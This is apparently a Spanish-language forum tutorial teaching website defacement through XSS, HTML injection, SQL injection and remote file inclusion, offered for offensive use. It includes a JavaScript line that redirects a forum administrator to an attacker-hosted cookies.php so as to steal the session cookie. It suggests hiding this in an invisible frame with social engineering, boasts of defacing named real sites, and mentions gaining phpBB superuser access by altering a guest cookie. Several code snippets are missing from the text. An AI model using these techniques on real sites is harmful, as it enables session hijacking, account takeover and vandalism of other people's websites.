Bien ya que antes en el antiguo foro y en este me pedian que explicara
como hacer un deface hice este tutorial con algunas de las tecnicas mas usadas
pero que igual no dejan de ser utiles

Aki vamos a aprovechar los bugs de las web no el de los servidores!
ya que esto de los servidores es un poco mas avanzado.

las tecnicas que voy a explicar:

-XSS (Cross Site Scripting)
-HTML Injection Simple
-SQL Injection
-RFI (Remote File Inclusion)


Comezemos:

----------
-XSS (Cross Site Scripting)
----------

Bien, esta tecnica se basa en el filtrado de codigo malicioso (html, javascript) por el servidor web
recuerden que javascript se ejecuta en el browser y no en el servidor, la mayoria de la gente piensa que esta tecnica
no sirve que solo sirve para sacar ventanitas de alerta, FALSO

Un ejemplo:

entramos a alguna web donde muestran las nuevas vulnerabilidades
y vemos que dice algo sobre un nuevo bug XSS en todos las versiones de los ipb en las etiquetas BBCODE
(bug muy comun en estas aplicaciones)

el bug se explota asi:



y donde dice codigo maligno pondriamos el cogigo javascript a ejecutar, que podemos hacer con esto, muchas cosas
si lo unico que queres hacer es molestarlo podriamos redireccionarlo a una web porno o tu sitio web personal

pero si se quiere intentar hacer un deface, podriamos intentar robar la cookie del admin

para esto necesitamos algunas cosas:

-un webhosting
-tener buena ingenieria social
-que el foro sea vulnerable
-que el browser del admin sea vulnerable

comenzemos primero

creamos un archivo de texto con este codigo:



lo guardamos como cookies.php y lo subimos a un servidor gratuito

ahora hay que construir el codigo que se va a encargar de robar la cookie

window.location='http://www.tuhosting.com/cookies.php?cookie='+document.cookie;

y aplicamos esto en el bug de los ipb:



esto es lo que ay que hacer que el admin visualize

con esto va a ser redireccionado al archivo encargado de robar la cookie

Claro que esto va a ser muy evidente y si el admin tiene algo de concocimentos cambiara su pass casi inmediatamente, para esto se puede aplicar un frame de borde 0 y posiblemte nunca sabria que paso xD

esto investigenlo ustedes no les voy a decir io xDD


------------------------

-HTML Injection Simple

------------------------

Esta es un tecnica muy newbie consite en injectar codigo html en la web esto se puede hacer mediate tagboards, libros de visitas, etc

para poder llevar acabo esta tecnica la aplicacion tiene que tener activado el html

para saberlo ueden intentar postear esto:



Si ven que la palabar hola aparece mas grande de lo normal es que tenemos html activado

y pueden poner un codigo de redireccion a cualquier web




xD

eso es todo, un ejemplo real:

www.galiciacity.net/guestbooks/view.cgi?hustler


ahahahahahah


--------------------------

-SQL Injection

--------------------------

Esta tecnica ya a sido hablada bastante les recomiendo leer este tutorial hecjo por jocanor
Muyb bueno


lkopsikolabs.gratishost.com/tutoriales/aportacion6.txt

muy util si señor

Resultados:

www.accidentadosnet.org.ar

si, si ya se no fue gran cosa, pero miren el titulo de la primer noticia o entren a ver la nota y miren el titulo de la ventana xD

ahahah



---------------------------------------

-RFI (Remote File Inclusion)

----------------------------------------


bue de esto ya e hablado antes a si que solo les dejo los links


http://www.hostdaper.com/foro/index.php?showtopic=169
http://www.hostdaper.com/foro/index.php?showtopic=172




-------------------

Bien hasta aki ya explique las tecnicas mas usadas en el defacing tambien podemos hacer uso de los continuso bugs que aparecen:

Me acorde de un bug que afecta a los phpbb descatualizados con el cual se podia consegui una cuenta de superusuario
moficando un poco la cookie de invitado.

aki los resultados:

http://forums.ahmed-jehanzeb.com

otro deface xD

con esto hicimos hackweb no al servidor eso en otro tutorial.